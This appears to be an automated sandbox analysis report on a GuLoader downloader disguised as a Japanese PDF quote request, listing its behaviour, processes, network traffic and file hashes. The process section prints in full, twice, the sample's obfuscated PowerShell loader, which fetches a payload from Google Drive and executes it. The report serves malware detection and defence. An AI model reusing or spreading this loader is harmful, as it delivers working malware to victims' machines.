Malware Analysis Report

2025-06-16 03:44

Sample ID 240325-dt8hzahf8y
Target 見積依頼先_(OU)_OSAKA-2024100044-05JP·pdf.zip
SHA256 903ab5d44a560508bd22ad1dd43fb10e603f1cdc7478dbec70f58c772294f56c
Tags
guloader downloader
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

903ab5d44a560508bd22ad1dd43fb10e603f1cdc7478dbec70f58c772294f56c

Threat Level: Known bad

The file 見積依頼先_(OU)_OSAKA-2024100044-05JP·pdf.zip was found to be: Known bad.

Malicious Activity Summary

guloader downloader

Guloader,Cloudeye

Blocklisted process makes network request

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-25 03:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-25 03:19

Reported

2024-03-25 03:29

Platform

win10-20240221-ja

Max time kernel

600s

Max time network

393s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\見積依頼先_(OU)_OSAKA-2024100044-05JP·pdf.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1476 set thread context of 4576 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2268 wrote to memory of 4308 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2268 wrote to memory of 4308 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4308 wrote to memory of 5108 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4308 wrote to memory of 5108 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4308 wrote to memory of 1476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4308 wrote to memory of 1476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4308 wrote to memory of 1476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1476 wrote to memory of 1000 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1476 wrote to memory of 1000 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1476 wrote to memory of 1000 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1476 wrote to memory of 4576 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1476 wrote to memory of 4576 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1476 wrote to memory of 4576 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1476 wrote to memory of 4576 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1476 wrote to memory of 4576 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\見積依頼先_(OU)_OSAKA-2024100044-05JP·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ironiserende Imborder Hulheden Peabird Lnkens Anstdssten #>;$Pebermynters=(cmd /c set /A 115^^0);Function albertuss ([String]$Armariolum215){$Pebermynters=[char][int]$Pebermynters;$Stikpiller=$Pebermynters+'ubstring';$Mistletoes=8;$Afhudes=Ridefogders($Armariolum215);For($Coapprover=7; $Coapprover -lt $Afhudes; $Coapprover+=$Mistletoes){$Dendropogon=$Armariolum215.$Stikpiller.Invoke($Coapprover, 1);$Konsistorialkontor=$Konsistorialkontor+$Dendropogon;}$Konsistorialkontor;}function Reflectorizing ($Frsteviolin){. ($Rebuffably) ($Frsteviolin);}function Ridefogders ([String]$Sagregisteret){$Enucleator=$Sagregisteret.Length-1;$Enucleator;}$Iatrochemical=albertuss ' RegistTEkspertrContradaHypothenSabelkas ,insenf BoppeneIncongrrBaadskar,enzinti randlonPr,gresg Ag rsk ';$Mynas248=albertuss 'JennifehPredicttExtremitUnm.ddlpMalkendsAurined:Addi,en/attaina/ Zonet dMetamorrIncir,ui OvereavNeuro.aeg.nandr. Indregg GangshoMu keorohemielygChimangl OrbitseUdebliv.PitchpocInterbloElsewismSyvstje/Caratesu PulvercAfklaps?svendepe Byplanx FormprpAkasastoAnaerobr Ver,entBloddon=StephandBazonbuoBughindw Hindign ExocyclThermo o Dueu ta CormacdIndkald&.ectumciAtelierd Narrat=Kveller1Tr nchctAttribunOvervioXd gpengrConvexiXBekranscCowli,ehEndu eovGleaminMBesmokeoPomaryuxGingerlF.ikkestTP,colete skatebWScuddl 7OutdariSLyophillSt.vens3 samariF Ma,vasRArmadae0SkippenmUd.ikli9ri.striy No,trawVestas.4RepaireO agocy3 WranglxFidusku2 C.rameXHollywo ';$Rebuffably=albertuss 'QuintusiSauerkrekvoterexfys,ote ';$Gooseskin=albertuss 'Indko,t$,nderbegSkrofu l FactuaoBastonabPlanetgaUnmeedyl Sieurs:FoleykuPExtenderBrayekoeSubnatua KontincZethstehExclaimeCurnst sMander Sk,somm=Film nd UnsizedS BoghantNigeriaaThermosrPhutplat Forpl.-HathawaBTheodidiEndossetDybl rnsFacitteT minsterM sonsbaFle.gudn MalerlsMultisefNothinge ForstrrKon.ito Underdi-GarageaSSubstano D.urwau An epar Rohanlc ball.teCockney Sideord$A.choreMOpvarmey I,termnhelicota Simu.asNastali2Tr ndse4Renegot8ltgbeck Barrela-KommentD Tekstbe Indb.ss Ventelt VialfuiUngskuen Enter,aSmugkrotKvk eneiImpedimoInf,acenFendill Unci l$Crunc iS Aoua sc ckeeinhRavespoiCorditizHabitaboGerrigtmSuperdeeGenopnardittiesiGadroona Papste ';Reflectorizing (albertuss 'Droumy,$JernfilgIm.odyil offosoLatrantbSkrmstyaD iverel Megaby:StudebaS telepac,egentshSpelliniTronfraztilfileo.isacchmMat.ikeeDhikrsgrFistelsiForfatta Finans=Escadri$LithopheAcidaspnCoregnavUnassai:CyklonbahovedskpFa,keltp TricoldForsy,iaL.vordet remun.aCoun er ') ;Reflectorizing (albertuss 'WienerpIPachy.emZ osporpCytoanaoPseudoprPregaintDr.kneu-SaucepaMOrlogs.oPplretedUndivulu atomf,lAttentie Sauced Cul,asuBPreexchiR mfiretKej,haasMargentTSvrindurCellarea,loakstnWrinklesSt.tikefOrdrerse oct.merAcetona ') ;$Schizomeria=$Schizomeria+'\Bjdens.Ant' ;Reflectorizing (albertuss 'Impa si$popp.ydgForbog,lA,rsagso strobobLoud rbaSneplovlTju.hne: PreconFholarctr DaahinoD.spitusTab lattCombinef Fangstr KaabesiAcajou e DermossSkaberg=propful(Do.beltTInputsteUn.hospsvernonitRuedesc- OliehoPRynkes,aHo,semotEnt,robhRegiste Pharmac$MegaaraSStjernecOver,tthGo,otheiAfskallzKalendeo isorlimPlannedeAfrignirIndkrediFerdiadaBilleds)gormssk ') ;while (-not $Frostfries) {Reflectorizing (albertuss 'Dis ikoIKabsminfFerashs Mon cid(Stormpr$Jg.rsprPFran,kgrIns.lare JiffphaMy.midoc Rit,alh SlangeeSmykkeasFlui.um.Pikt,grJGodkendoTilemakbConferrSHjforrdtA.tokraa RelatitIrasja e Bestse Bunomas-Puk,erheSailyfaqR micat Forske$HalvhedI Ba,kgaaGazernetMishandrAbstineoavisartcGaaretnhHerpesteHeterosmIndbe eiHjlan scKursor.aSaddelml Mammit)Faklen Fortykk{CanafisSInterkitSu erhea Sspejdr Mone.atVetkous-SvedsbySDiagonalBeskydeePointere BambuspMoyit s I.comme1 shiesp}Fjor,reeTjenestlOomancysSoldateeDybdahl{ Tro,heS KondictForkobraBekosterSocialatSanguif- ConchoSEnkeltvlFlygtnieSyno,yme Se.skapKa,abas Delumin1Pigenav;Dobbe rR Diquate ReprodfAndaluslSpati teVideregc Toxifet Udsta.o ,outgjrAnnihili Ant,pazGrundtaidjvlehon iolsflg.hamabl Balloan$ QuelchG Besu.loMetricaoNon,arrsS.aansoeFlimsyssFotoalbkBrillefiMomsersnUnfoxy.}ulovmed ');Reflectorizing (albertuss 'Brnds.l$Hugger,g O ertilOch,mysoRetreatbSkrivesaFor,ikllAfvikli:Unvnel.FParrotsr PedelloB weryls RodenstAffarvef Aley.rr skilniimanac seMismatcsMakvrke=overado(SvartbaTminimereGr.tuitsunddragtpre ect-PortepePRemplacaImprgnetAlbedogh Pe.hyd Hitherw$SpingelSRingstec KolerihObskurfi DressrzSaccomyoUninhibmVarmefreDiphyllrUover,oi Lint.laKapacit)Hjlpepr ') ;}Reflectorizing (albertuss 'Her.eli$ Skon egsubstanlSanatoroHaandhvbCorrivaaTwitchel orrupt:BestialaRibbonenAflnni,tpen estiHypoders F,rtrycInfrasphXylof,noSwollenl L,anabaHalimous rappitTho,ougi Rewardc Rumm naForcibllRet inilHyperthyyagouru Afblegn=Spizzer ForvarmGAtomulyeReprimat Ugelan-AvertdeC NemospoForm ivnAuthorit nlbenpeskilrednBesvrlitSouveni Ron edo$HalvgudSGuldrancTjurhnehMelis aiFriz,grz TilhngoInterprmBeyli.aeE.stemprDeglam.iBgededea,jrnsol ');Reflectorizing (albertuss 'Headsai$ ForesogSynkronlNyttevioUforgngbOceanolaExquisilDrmmesy: Int,rmBUnivocae mennesfAr illeoCy niderRa,iospdUnreturrEuropewiUdenlann BendtlgKarolinsPrsen,am EarpiciLousedtdUnikkesl AfklapeIsoclinrSavedes2D.missi0affress1Armeni, .anebor=Coconu. ,ildoe[ StybbaSCh onicyComproms DinarztP,anetaeFlagermm Resinr. BornhoCKvivaleoMetastanEgelkkevBambu reRaisedarStampemtPutativ]Utu.ten:Gennemb:ElectroF Age.dar Ol enbo Subpiam Sop.edB angensaTactualsKondoleeBlndvrk6 udesth4OligospS BredbatMislighrSwordm,iAdolphcnflorifig svajry(Evoluti$Del.algaIndtrkknFormrketPropolsiRoughlesHol quicPreferehFr.sepuo,nytninl H rregaSolcellsMy tiqutKonneksiTricarbcrkeen.eaBitte.ll,lagterlMarblieyFladetp) Volumi ');Reflectorizing (albertuss ' esecti$Sin.erlgUncocksl ,atrilo Meg spbSuperdua Stern.lAl onym: Wit.edB Nomadel Vol.nttGeosciee Ti sspsFruticut ZygobreKildetedSpirit.eNeologirHeterolsLakerer Tyrerin=Opspori Trafika[InkonseSTrolde yS rannesArchductUnpervee DiphthmHarmoni. Fjer,kTPigmentevisernexUndershtPistill. Er.ticEKaolinsnRe.eldic PartreoAspirandOveranaiTros.amnKoda.isgBerigei]Maddike:Skyndte:PrettyiAKnbjninSMicromeCTnderenI BogsidIUnfooli..ennemsGRedninge OvervitRaafrugSAthrocytCon inurBathyali gazolynFetichigTapestr(.utobio$ ValutaBApathieeZoologifIncaveroLaputapr discladKattefjrVi orisiDraconin.isarmegKaoli,is Urege.m P.rensi Foruredsprng,rl Fusarie UnsocirSte mti2Indhyll0hemmeli1Pollina)Polyr.y ');Reflectorizing (albertuss ' Naturs$UnpagangPro andl Gener onedga,gb SprngsaProbosclEnkelta: EmanerMSovietioOutshamd HammedvKolkhosiCuratiznPragmatdTamponeePurinsbnDrivmid=transvo$RejfernBCand,lllPampin t Neutrae GenoptsAdiaphotThroatle ummertdSalleeteHemocoer Rebaptstimingf.BimahvasNotifi,u Empa sbBo ardosFissipetReferrerpree.apiResi.uan,entefrgDommerk(Kderege3Taragec5Legemli0 Udmeld4Spoke,w3Magneti9Rengjo , Cynanc3Afskrab1 Unperc7gymnasi5 Ukorre0Praefik)Bronkos ');Reflectorizing $Modvinden;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Ironiserende Imborder Hulheden Peabird Lnkens Anstdssten #>;$Pebermynters=(cmd /c set /A 115^^0);Function albertuss ([String]$Armariolum215){$Pebermynters=[char][int]$Pebermynters;$Stikpiller=$Pebermynters+'ubstring';$Mistletoes=8;$Afhudes=Ridefogders($Armariolum215);For($Coapprover=7; $Coapprover -lt $Afhudes; $Coapprover+=$Mistletoes){$Dendropogon=$Armariolum215.$Stikpiller.Invoke($Coapprover, 1);$Konsistorialkontor=$Konsistorialkontor+$Dendropogon;}$Konsistorialkontor;}function Reflectorizing ($Frsteviolin){. ($Rebuffably) ($Frsteviolin);}function Ridefogders ([String]$Sagregisteret){$Enucleator=$Sagregisteret.Length-1;$Enucleator;}$Iatrochemical=albertuss ' RegistTEkspertrContradaHypothenSabelkas ,insenf BoppeneIncongrrBaadskar,enzinti randlonPr,gresg Ag rsk ';$Mynas248=albertuss 'JennifehPredicttExtremitUnm.ddlpMalkendsAurined:Addi,en/attaina/ Zonet dMetamorrIncir,ui OvereavNeuro.aeg.nandr. Indregg GangshoMu keorohemielygChimangl OrbitseUdebliv.PitchpocInterbloElsewismSyvstje/Caratesu PulvercAfklaps?svendepe Byplanx FormprpAkasastoAnaerobr Ver,entBloddon=StephandBazonbuoBughindw Hindign ExocyclThermo o Dueu ta CormacdIndkald&.ectumciAtelierd Narrat=Kveller1Tr nchctAttribunOvervioXd gpengrConvexiXBekranscCowli,ehEndu eovGleaminMBesmokeoPomaryuxGingerlF.ikkestTP,colete skatebWScuddl 7OutdariSLyophillSt.vens3 samariF Ma,vasRArmadae0SkippenmUd.ikli9ri.striy No,trawVestas.4RepaireO agocy3 WranglxFidusku2 C.rameXHollywo ';$Rebuffably=albertuss 'QuintusiSauerkrekvoterexfys,ote ';$Gooseskin=albertuss 'Indko,t$,nderbegSkrofu l FactuaoBastonabPlanetgaUnmeedyl Sieurs:FoleykuPExtenderBrayekoeSubnatua KontincZethstehExclaimeCurnst sMander Sk,somm=Film nd UnsizedS BoghantNigeriaaThermosrPhutplat Forpl.-HathawaBTheodidiEndossetDybl rnsFacitteT minsterM sonsbaFle.gudn MalerlsMultisefNothinge ForstrrKon.ito Underdi-GarageaSSubstano D.urwau An epar Rohanlc ball.teCockney Sideord$A.choreMOpvarmey I,termnhelicota Simu.asNastali2Tr ndse4Renegot8ltgbeck Barrela-KommentD Tekstbe Indb.ss Ventelt VialfuiUngskuen Enter,aSmugkrotKvk eneiImpedimoInf,acenFendill Unci l$Crunc iS Aoua sc ckeeinhRavespoiCorditizHabitaboGerrigtmSuperdeeGenopnardittiesiGadroona Papste ';Reflectorizing (albertuss 'Droumy,$JernfilgIm.odyil offosoLatrantbSkrmstyaD iverel Megaby:StudebaS telepac,egentshSpelliniTronfraztilfileo.isacchmMat.ikeeDhikrsgrFistelsiForfatta Finans=Escadri$LithopheAcidaspnCoregnavUnassai:CyklonbahovedskpFa,keltp TricoldForsy,iaL.vordet remun.aCoun er ') ;Reflectorizing (albertuss 'WienerpIPachy.emZ osporpCytoanaoPseudoprPregaintDr.kneu-SaucepaMOrlogs.oPplretedUndivulu atomf,lAttentie Sauced Cul,asuBPreexchiR mfiretKej,haasMargentTSvrindurCellarea,loakstnWrinklesSt.tikefOrdrerse oct.merAcetona ') ;$Schizomeria=$Schizomeria+'\Bjdens.Ant' ;Reflectorizing (albertuss 'Impa si$popp.ydgForbog,lA,rsagso strobobLoud rbaSneplovlTju.hne: PreconFholarctr DaahinoD.spitusTab lattCombinef Fangstr KaabesiAcajou e DermossSkaberg=propful(Do.beltTInputsteUn.hospsvernonitRuedesc- OliehoPRynkes,aHo,semotEnt,robhRegiste Pharmac$MegaaraSStjernecOver,tthGo,otheiAfskallzKalendeo isorlimPlannedeAfrignirIndkrediFerdiadaBilleds)gormssk ') ;while (-not $Frostfries) {Reflectorizing (albertuss 'Dis ikoIKabsminfFerashs Mon cid(Stormpr$Jg.rsprPFran,kgrIns.lare JiffphaMy.midoc Rit,alh SlangeeSmykkeasFlui.um.Pikt,grJGodkendoTilemakbConferrSHjforrdtA.tokraa RelatitIrasja e Bestse Bunomas-Puk,erheSailyfaqR micat Forske$HalvhedI Ba,kgaaGazernetMishandrAbstineoavisartcGaaretnhHerpesteHeterosmIndbe eiHjlan scKursor.aSaddelml Mammit)Faklen Fortykk{CanafisSInterkitSu erhea Sspejdr Mone.atVetkous-SvedsbySDiagonalBeskydeePointere BambuspMoyit s I.comme1 shiesp}Fjor,reeTjenestlOomancysSoldateeDybdahl{ Tro,heS KondictForkobraBekosterSocialatSanguif- ConchoSEnkeltvlFlygtnieSyno,yme Se.skapKa,abas Delumin1Pigenav;Dobbe rR Diquate ReprodfAndaluslSpati teVideregc Toxifet Udsta.o ,outgjrAnnihili Ant,pazGrundtaidjvlehon iolsflg.hamabl Balloan$ QuelchG Besu.loMetricaoNon,arrsS.aansoeFlimsyssFotoalbkBrillefiMomsersnUnfoxy.}ulovmed ');Reflectorizing (albertuss 'Brnds.l$Hugger,g O ertilOch,mysoRetreatbSkrivesaFor,ikllAfvikli:Unvnel.FParrotsr PedelloB weryls RodenstAffarvef Aley.rr skilniimanac seMismatcsMakvrke=overado(SvartbaTminimereGr.tuitsunddragtpre ect-PortepePRemplacaImprgnetAlbedogh Pe.hyd Hitherw$SpingelSRingstec KolerihObskurfi DressrzSaccomyoUninhibmVarmefreDiphyllrUover,oi Lint.laKapacit)Hjlpepr ') ;}Reflectorizing (albertuss 'Her.eli$ Skon egsubstanlSanatoroHaandhvbCorrivaaTwitchel orrupt:BestialaRibbonenAflnni,tpen estiHypoders F,rtrycInfrasphXylof,noSwollenl L,anabaHalimous rappitTho,ougi Rewardc Rumm naForcibllRet inilHyperthyyagouru Afblegn=Spizzer ForvarmGAtomulyeReprimat Ugelan-AvertdeC NemospoForm ivnAuthorit nlbenpeskilrednBesvrlitSouveni Ron edo$HalvgudSGuldrancTjurhnehMelis aiFriz,grz TilhngoInterprmBeyli.aeE.stemprDeglam.iBgededea,jrnsol ');Reflectorizing (albertuss 'Headsai$ ForesogSynkronlNyttevioUforgngbOceanolaExquisilDrmmesy: Int,rmBUnivocae mennesfAr illeoCy niderRa,iospdUnreturrEuropewiUdenlann BendtlgKarolinsPrsen,am EarpiciLousedtdUnikkesl AfklapeIsoclinrSavedes2D.missi0affress1Armeni, .anebor=Coconu. ,ildoe[ StybbaSCh onicyComproms DinarztP,anetaeFlagermm Resinr. BornhoCKvivaleoMetastanEgelkkevBambu reRaisedarStampemtPutativ]Utu.ten:Gennemb:ElectroF Age.dar Ol enbo Subpiam Sop.edB angensaTactualsKondoleeBlndvrk6 udesth4OligospS BredbatMislighrSwordm,iAdolphcnflorifig svajry(Evoluti$Del.algaIndtrkknFormrketPropolsiRoughlesHol quicPreferehFr.sepuo,nytninl H rregaSolcellsMy tiqutKonneksiTricarbcrkeen.eaBitte.ll,lagterlMarblieyFladetp) Volumi ');Reflectorizing (albertuss ' esecti$Sin.erlgUncocksl ,atrilo Meg spbSuperdua Stern.lAl onym: Wit.edB Nomadel Vol.nttGeosciee Ti sspsFruticut ZygobreKildetedSpirit.eNeologirHeterolsLakerer Tyrerin=Opspori Trafika[InkonseSTrolde yS rannesArchductUnpervee DiphthmHarmoni. Fjer,kTPigmentevisernexUndershtPistill. Er.ticEKaolinsnRe.eldic PartreoAspirandOveranaiTros.amnKoda.isgBerigei]Maddike:Skyndte:PrettyiAKnbjninSMicromeCTnderenI BogsidIUnfooli..ennemsGRedninge OvervitRaafrugSAthrocytCon inurBathyali gazolynFetichigTapestr(.utobio$ ValutaBApathieeZoologifIncaveroLaputapr discladKattefjrVi orisiDraconin.isarmegKaoli,is Urege.m P.rensi Foruredsprng,rl Fusarie UnsocirSte mti2Indhyll0hemmeli1Pollina)Polyr.y ');Reflectorizing (albertuss ' Naturs$UnpagangPro andl Gener onedga,gb SprngsaProbosclEnkelta: EmanerMSovietioOutshamd HammedvKolkhosiCuratiznPragmatdTamponeePurinsbnDrivmid=transvo$RejfernBCand,lllPampin t Neutrae GenoptsAdiaphotThroatle ummertdSalleeteHemocoer Rebaptstimingf.BimahvasNotifi,u Empa sbBo ardosFissipetReferrerpree.apiResi.uan,entefrgDommerk(Kderege3Taragec5Legemli0 Udmeld4Spoke,w3Magneti9Rengjo , Cynanc3Afskrab1 Unperc7gymnasi5 Ukorre0Praefik)Bronkos ');Reflectorizing $Modvinden;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 208.238.32.23.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.169.46:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.180.1:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 1.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 46.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 41.173.79.40.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

MD5 6b827d3db185d7683eece97f29608086
SHA1 c26adfa0a2e298673b02ca7ed747f1281657bdfd
SHA256 15bf13a624857d8e263a658d6688d9d0e257f09c581cc32563a1a6c3cbaf4e5a
SHA512 f591badab95d54d92f45c898f61468fee966a388a957d16a73f2930ed89c3b50800665e253f1788b8ffc34a28c648c9c029f13513f69e3232d1c0cbcf51a30cf

C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

MD5 8081c46484ad01d18048e3f41ee6e244
SHA1 535049d80375e3079989042a07cf921b7bd17d3b
SHA256 e35874bb0a7222223642ad393cce0f1e2cb69e83aa8cefcf94236b5732be987c
SHA512 f706e4fe9c8948d8f69893422895b8e030954cb4cb06059a529aea51b0e4fa5c4cae0facb77ff026dfc0c57d3564e99e32c3f0b8d27548cff5c058e45ab86584

C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

MD5 22e79aa7aa0322451169b0f596317371
SHA1 fffac880e9b0924315671291d729587dd489e753
SHA256 26c664aac237da4c835aed3fe7c42924cf7321a05b1c2fc867ae85d05311345d
SHA512 3a1a864cb569e6fc6253c00970838fb8ba2eb6f7d73ec359b41314c1bed7db1ee523203b099f451d805cad94da8381364b50cbc4dd34183b81197b62ffd4e699

memory/2268-258-0x000001C1342F0000-0x000001C134381000-memory.dmp

memory/4308-263-0x0000017322900000-0x0000017322992000-memory.dmp

memory/4308-264-0x00007FFB4A2E0000-0x00007FFB4ACCC000-memory.dmp

memory/4308-266-0x00000173228F0000-0x0000017322900000-memory.dmp

memory/4308-265-0x0000017322850000-0x0000017322860000-memory.dmp

memory/4308-268-0x00000173228A0000-0x00000173228C2000-memory.dmp

memory/4308-267-0x00000173228F0000-0x0000017322900000-memory.dmp

memory/4308-269-0x0000017322C90000-0x0000017322D9E000-memory.dmp

memory/4308-272-0x0000017322EA0000-0x0000017322F16000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fryo0evx.xrv.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4308-353-0x0000017322B30000-0x0000017322B52000-memory.dmp

memory/4308-392-0x0000017322FF0000-0x0000017323002000-memory.dmp

memory/4308-393-0x00000173228F0000-0x0000017322900000-memory.dmp

memory/4308-400-0x0000017322B70000-0x0000017322B78000-memory.dmp

memory/4308-402-0x00000173228F0000-0x0000017322900000-memory.dmp

memory/1476-406-0x0000000073780000-0x0000000073E6E000-memory.dmp

memory/1476-405-0x0000000004900000-0x0000000004936000-memory.dmp

memory/1476-408-0x0000000004A60000-0x0000000004A70000-memory.dmp

memory/4308-407-0x00007FFB4A2E0000-0x00007FFB4ACCC000-memory.dmp

memory/1476-410-0x0000000004A60000-0x0000000004A70000-memory.dmp

memory/4308-409-0x00000173228F0000-0x0000017322900000-memory.dmp

memory/1476-411-0x0000000007420000-0x0000000007A48000-memory.dmp

memory/1476-412-0x00000000071A0000-0x0000000007232000-memory.dmp

memory/1476-413-0x0000000007A50000-0x0000000007A72000-memory.dmp

memory/1476-414-0x0000000007AF0000-0x0000000007B56000-memory.dmp

memory/1476-415-0x0000000007C60000-0x0000000007CC6000-memory.dmp

memory/1476-416-0x0000000007110000-0x0000000007120000-memory.dmp

memory/1476-417-0x0000000007DC0000-0x0000000008110000-memory.dmp

memory/1476-418-0x0000000008220000-0x000000000832E000-memory.dmp

memory/1476-419-0x00000000081B0000-0x00000000081CC000-memory.dmp

memory/1476-420-0x00000000081D0000-0x000000000821B000-memory.dmp

memory/1476-421-0x0000000008640000-0x00000000086B6000-memory.dmp

memory/1476-436-0x0000000009F10000-0x000000000A588000-memory.dmp

memory/1476-437-0x00000000094A0000-0x00000000094BA000-memory.dmp

memory/1476-444-0x00000000097A0000-0x0000000009834000-memory.dmp

memory/1476-445-0x0000000009730000-0x0000000009752000-memory.dmp

memory/1476-446-0x000000000A590000-0x000000000AA8E000-memory.dmp

memory/1476-487-0x0000000009850000-0x0000000009870000-memory.dmp

memory/4308-496-0x00000173228F0000-0x0000017322900000-memory.dmp

memory/1476-499-0x0000000004A60000-0x0000000004A70000-memory.dmp

memory/1476-518-0x0000000009970000-0x0000000009982000-memory.dmp

memory/1476-520-0x0000000004A60000-0x0000000004A70000-memory.dmp

memory/4308-519-0x00000173228F0000-0x0000017322900000-memory.dmp

memory/1476-521-0x0000000004A60000-0x0000000004A70000-memory.dmp

memory/1476-528-0x0000000009BA0000-0x0000000009BA1000-memory.dmp

memory/1476-529-0x000000000AA90000-0x000000000DD4B000-memory.dmp

memory/4308-545-0x00000173228F0000-0x0000017322900000-memory.dmp

memory/1476-556-0x000000000AA90000-0x000000000DD4B000-memory.dmp

memory/1476-683-0x0000000073780000-0x0000000073E6E000-memory.dmp

memory/1476-701-0x00007FFB66D90000-0x00007FFB66F6B000-memory.dmp

memory/1476-8246-0x0000000004A60000-0x0000000004A70000-memory.dmp

memory/1476-15507-0x0000000004A60000-0x0000000004A70000-memory.dmp

memory/1476-22185-0x0000000004A60000-0x0000000004A70000-memory.dmp

memory/1476-28455-0x0000000004A60000-0x0000000004A70000-memory.dmp

memory/1476-28457-0x0000000004A60000-0x0000000004A70000-memory.dmp

memory/1476-41460-0x000000000AA90000-0x000000000DD4B000-memory.dmp

memory/1476-1403703-0x00000000774C1000-0x00000000775D4000-memory.dmp

memory/4576-1406952-0x0000000004190000-0x000000000744B000-memory.dmp

memory/4576-1407123-0x00007FFB66D90000-0x00007FFB66F6B000-memory.dmp

memory/4576-1456210-0x0000000004190000-0x000000000744B000-memory.dmp

memory/1476-1579174-0x0000000073780000-0x0000000073E6E000-memory.dmp

memory/1476-1579180-0x000000000AA90000-0x000000000DD4B000-memory.dmp

memory/4308-1579308-0x00007FFB4A2E0000-0x00007FFB4ACCC000-memory.dmp